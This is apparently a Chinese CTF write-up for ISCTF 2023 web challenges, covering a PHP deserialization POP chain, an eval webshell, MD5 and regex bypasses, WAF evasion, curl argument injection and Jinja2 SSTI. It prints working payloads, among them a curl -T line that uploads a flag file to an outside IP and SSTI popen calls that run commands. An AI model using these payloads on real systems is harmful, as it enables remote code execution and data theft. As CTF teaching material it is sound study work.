圣杯战争!!!
前置知识:
反序列化魔法函数:(以俩个下划线开头的方法称为魔法函数)
__construct() 在创建对象时候初始化对象,一般用于对变量赋初值。创建一个新的类时,自动调用该方法
__destruct() 和构造函数相反,当对象所在函数调用完毕后执行.即当一个类被销毁时自动调用该方法
__toString() 当对象被当做一个字符串使用时调用
__sleep() 当调用serialize()函数时,PHP 将试图在序列动作之前调用该对象的成员函数 __sleep()。这就允许对象在被序列化之前做任何清除操作
__wakeup() 反序列化恢复对象之前调用该方法。当使用 unserialize() 恢复对象时, 将调用 __wakeup() 成员函数
__invoke() 把一个实例对象当作函数使用时被调用
__call() 调用不可访问或不存在的方法时被调用
__callStatic() 调用不可访问或不存在的静态方法时自动调用
__get() 在调用私有属性的时候会自动执行,或者给不可访问或不存在属性赋值时也会被调用
__isset() 在不可访问的属性上调用 isset() 或 empty() 时触发
__set() 当给不可访问或不存在属性赋值时被调用
__unset() 在不可访问的属性上使用 unset() 时触发
__set_state() 当调用 var_export() 导出类时,此静态方法被调用。用 __set_state() 的返回值做为 var_export() 的返回值
__clone() 进行对象clone时被调用,用来调整对象的克隆行为
__debuginfo() 当调用 var_dump() 打印对象时被调用(当你不想打印所有属性),适用于PHP5.6版本
题目:
<?php highlight_file(__FILE__); error_reporting(0); class artifact{ public $excalibuer; public $arrow; public function __toString(){ echo "为Saber选择了对的武器!<br>"; return $this->excalibuer->arrow; } } class prepare{ public $release; public function __get($key){ $functioin = $this->release; echo "蓄力!咖喱棒!!<br>"; return $functioin(); } } class saber{ public $weapon; public function __invoke(){ echo "胜利!<br>"; include($this->weapon); } } class summon{ public $Saber; public $Rider; public function __wakeup(){ echo "开始召唤从者!<br>"; echo $this->Saber; } } if(isset($_GET['payload'])){ unserialize($_GET['payload']); } ?>
很简单一道反序列化的题:
链子的构造思路:首先从summom类中的__wakeup魔术方法入手,因为当进行unserialize时候,最先会调用__wakeup以及__destruct魔术方法,所以我们进行构造的话,先从summom类进行构造
构造如下:
<?php class artifact{ public $excalibuer; public $arrow; } class prepare{ public $release; } class saber{ public $weapon; } class summon{ public $Saber; public $Rider; } $a=new summon; echo serialize($a); ?>
可以看到这里成功调用的__wakeup魔术方法
然后我们进入到__wakeup魔术方法,可以看到这里面有个echo $this->Saber,echo是用来返回字符串的,所以说如果我们将Saber new成artifact类的对象,这样的话就会把对象当作字符串来使用就会调用__tostring魔术方法。
代码如下:
<?php class artifact{ public $excalibuer; public $arrow; } class prepare{ public $release; } class saber{ public $weapon; } class summon{ public $Saber; public $Rider; } $a=new summon; $a->Saber = new artifact; echo serialize($a); ?>
看到成功进入了__tostring魔术方法
进入到__tostring魔术方法后在
return $this->excalibuer->arrow;
这里我们将excalibuer new为prepare的对象,因为我们将excalibuer new为prepare的对象的话,而arrow属性是在prepare类中找不到的,这样的话就会调用prepare类中的__get魔术方法
代码如下:
<?php class artifact{ public $excalibuer; public $arrow; } class prepare{ public $release; } class saber{ public $weapon; } class summon{ public $Saber; public $Rider; } $a=new summon; $a->Saber = new artifact; $a->Saber->excalibuer =new prepare; echo serialize($a); ?>
看到成功进入了__get魔术方法
接着进入到__get魔术方法后,如果我们将属性release new为 saber的对象的话因为 $functioin = $this->release;
和return $functioin();
先
将function也变为类saber的对象,然后return $function()将对象当作了函数进行使用,所以的话这里就会调用saber类中的__invoke魔术方法
代码如下:
<?php class artifact{ public $excalibuer; public $arrow; } class prepare{ public $release; } class saber{ public $weapon; } class summon{ public $Saber; public $Rider; } $a=new summon; $a->Saber = new artifact; $a->Saber->excalibuer =new prepare; $a->Saber->excalibuer->release=new saber; echo serialize($a); ?>
可以看到成功进入了__invoke魔术方法
__invoke魔术方法里面有include函数,这里便知道需要使用文件包含获得flag
完整代码如下:
<?php class artifact{ public $excalibuer; public $arrow; } class prepare{ public $release; } class saber{ public $weapon; } class summon{ public $Saber; public $Rider; } $a=new summon; $a->Saber = new artifact; $a->Saber->excalibuer =new prepare; $a->Saber->excalibuer->release=new saber; $a->Saber->excalibuer->release->weapon="php://filter/convert.base64-encode/resource=flag.php"; echo serialize($a); ?>
传入:/?payload=O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}s:5:"arrow";N;}s:5:"Rider";N;} 便可以获得flag
where_is_the_flag
已给一句话
<?php //flag一分为3,散落在各处,分别是:xxxxxxxx、xxxx、xxx。 highlight_file(__FILE__); //标准一句话木马~ eval($_POST[1]); ?>
这里的话前俩个flag应该都可以找到,主要进行讲解第三个flag
第三个flag:
我们先找到docker文件
这段代码是一个用于修改和管理服务器上 Flag 变量的脚本。以下是代码的详细解释:
1. 使用 `sed` 命令替换 `flag.php` 文件中的 `{{FLAG1}}` 为前10个字符的 `FLAG` 变量值。`sed` 是一种文本编辑器,可以用于在文件中搜索和替换字符串。
2. 使用 `echo` 命令将 `FLAG` 变量从第11个字符开始的10个字符输出到 `/flag2` 文件。
3. 将 `FLAG` 变量从第21个字符开始的10个字符设置为新的 `FLAG3` 变量。
4. 将修改后的 `FLAG3` 变量值重新设置为 `FLAG` 变量。
5. 最后,启动 Apache(httpd)服务器,并将其设置为在前台运行(`FOREGROUND`)。
总体来说,这段代码的主要目的是修改 `flag.php` 文件中的特定字符串,并将修改后的值保存到其他文件中。此外,它还用于在服务器上设置和管理 `FLAG` 和 `FLAG3` 变量。
由此可知:flag3被设置为环境变量
这里我们可以用echo $FLAG3将其打印出来
绕进你的心里
<?php highlight_file(__FILE__); error_reporting(0); require 'flag.php'; $str = (String)$_POST['pan_gu']; $num = $_GET['zhurong']; $lida1 = $_GET['hongmeng']; $lida2 = $_GET['shennong']; if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){ echo "md5绕过了!"; if(preg_match("/[0-9]/", $num)){ die('你干嘛?哎哟!'); } elseif(intval($num)){ if(preg_match('/.+?ISCTF/is', $str)){ die("再想想!"); } if(stripos($str, '2023ISCTF') === false){ die("就差一点点啦!"); } echo $flag; } } ?>
参考链接:https://blog.csdn.net/wangyuxiang946/article/details/131156104
绕过(stripos($str, '2023ISCTF') === false) 参考 2023SHCTF <1zzphp>
利用脚本
import requests url="http://43.249.195.138:21251/?hongmeng[]=1&shennong[]=2&zhurong[]=1" data={ 'pan_gu':'very'*250000+'2023ISCTF' } r=requests.post(url,data=data) print(r.text)
wafr
<?php /* Read /flaggggggg.txt */ error_reporting(0); header('Content-Type: text/html; charset=utf-8'); highlight_file(__FILE__); if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])){//strings die("想读我文件?大胆。"); } elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])){ die("无字母数字RCE?大胆!"); } elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])){ die("奇技淫巧?大胆!!"); } elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])){ die("大胆!!!"); } else{ assert($_POST['code']); }
这里使用无字母数字构造Webshell
参考链接:https://cn-sec.com/archives/189017.html
看到php版本为7.0多
所以我们可以使用payload:(phpinfo)() 这种形式进行命令执行
最终paylaod:code=(system)('ta\c /f*')
fuzz!
<?php /* Read /flaggggggg.txt Hint: 你需要学会fuzz,看着键盘一个一个对是没有灵魂的 知识补充:curl命令也可以用来读取文件哦,如curl file:///etc/passwd */ error_reporting(0); header('Content-Type: text/html; charset=utf-8'); highlight_file(__FILE__); $file = 'file:///etc/passwd'; if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){ die('你需要fuzz一下哦~'); } if(!preg_match("/fi|le|flag/i", $_GET['file'])){ $file = $_GET['file']; } system('curl '.$file);
可以看到他对于很多东西都进行了过滤,我们先进行fuzz看看他对于哪些进行了过滤。
贴一个脚本:
<?php for($i=32;$i<127;$i++) { if (!preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i",chr($i))){ echo chr($i); } } ?>
看到还剩下这么多没有被过滤掉。因此我们可以使用curl -T的命令,从而获得我们的flag
参考题目:2023极客大挑战- ctf_curl
payload:?file= -T /f[l][a][g]gggggg.txt 103.225.198.70:9999
恐怖G7人
考点:ssti模板注入
这里输入{{7*7}}
可以看到得到的结果为49
所以存在ssti模板注入
参考我之前的文章:https://www.cnblogs.com/kode00/p/17353251.html
payload:{{''.__class__.__base__.__subclasses__()[154].__init__.__globals__['popen']('ls').read()}}
不过这里得到的是假的flag
我们可以通过获得环境变量来得到flag,如下:
Payload:{{''.__class__.__base__.__subclasses__()[154].__init__.__globals__['popen']('env').read()}}
标签:__,WEB,调用,Saber,ISCTF,echo,flag,new From: https://www.cnblogs.com/kode00/p/17848941.html